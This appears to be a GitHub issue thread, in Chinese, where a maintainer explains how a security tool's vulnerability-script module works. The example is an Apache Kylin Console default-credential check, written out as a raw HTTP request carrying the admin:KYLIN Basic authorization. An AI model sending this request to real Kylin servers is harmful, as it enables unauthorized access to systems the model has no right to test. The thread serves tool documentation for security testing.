We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
请问漏洞脚本模块如何使用。
The text was updated successfully, but these errors were encountered:
有自定义的 POC格式吗,能否展现一下
Sorry, something went wrong.
漏洞脚本是一个很简单的功能,可以说是对数据重放功能的一个请求包的保存,这里举个简单的例子,我找了一个goby的一个 Apache Kylin Console 控制台弱口令的Poc,通过查看他的json文件发现关键请求如下:
"Request": { "method": "GET", "uri": "/kylin/api/user/authentication", "follow_redirect": true, "header": { "Authorization": "Basic YWRtaW46S1lMSU4=", "Cookie": "project=null" }, "data_type": "text", "data": "" },
请求方式和地址是GET /kylin/api/user/authentication,密码验证 "Authorization": "Basic YWRtaW46S1lMSU4=", Cookie "Cookie": "project=null" 这里可以构造一个原始数据重放包
GET /kylin/api/user/authentication HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.64 Authorization: Basic $<Base64>admin:KYLIN</Base64>$ Cookie: project=null
然后点保持请求,这样就形成一个简单的Exp,调用的时候只需要在漏洞脚本哪里双击就可以直接调用,而执行目标则在右边的参数配置栏这里。
Apache Kylin Console 控制台弱口令.exp
其实在实践中发现这个功能虽然简单,但是exp基本得靠自己写...相对难度比较大,目前已经着手寻找exp、poc比较丰富的库,准备做兼容调用,这样大家就不用自己去写,直接用现成的行了
No branches or pull requests
请问漏洞脚本模块如何使用。
The text was updated successfully, but these errors were encountered: